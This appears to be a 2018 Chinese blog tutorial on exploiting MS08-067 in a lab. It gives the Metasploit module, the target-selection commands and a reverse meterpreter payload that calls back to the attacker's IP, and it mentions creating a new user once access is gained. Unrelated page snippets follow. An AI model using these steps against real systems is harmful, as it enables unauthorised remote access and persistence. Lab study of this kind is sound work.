ms08-067
环境
攻击机器:ubuntu 18.04
可能使用的工具
metasploit
nessus
nmap等
正文
首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166
发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是ms08-067.ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,当然在老系统中。
- 使用命令
msfconsole
进入metasploit控制台 - 使用命令
search ms08-067
搜索MS08-067可利用的exploit - 使用命令
use exploit/windows/smb/ms08_067_netapi
选择exploit - 使用命令
show options
查看配置选项 - 使用命令
show payloads
查看所有可以利用的payload - 使用set命令设置payload
set payload windows/meterpreter/rever
- 设置所有的必选的参数,其中攻击机的IP为192.168.1.181,被攻击机器IP为192.168.1.166
其中的target的值为10代表目标机器的操作系统为windows xp sp2 简体中文版
操作系统的确定可以使用nmap -O
- 使用命令
run
运行 - 后继操作
后继的操作就很好玩了,比如创建一个新的用户
结束。
文章最后发布于: 2018-11-20 20:41:57
相关阅读
Spring Security 小记 - @Secured(), @PreAuthorize()
目录Spring Security 小记前言权限注解小坑Spring Security 小记 记录一下Spring Security(版本为4) 中的 @Secured(), @PreAuthor
activity-alias是android里为了反复使用Activity而设计的。当在Activity的onCreate()方法里,运行getIntent().getComponent().getC
#include<stdio.h>int main(){int n,m,s;n=1;m=1;while(n<=10){m*=n;s+=m;n++;}printf("%d",s);return 0;}
➡️ www.webstack.cc - 网址导航 项目开源地址: https://github.com/WebStackPage/WebStackPage.github.io 这是一个纯静态的网址
岁月匆匆如流水,一如梦幻十几载,从开服一直断断续续玩到现在,情怀依在,一直在游戏里就属于屌丝行列(游戏舍不得花钱^_^),梦幻的外挂还是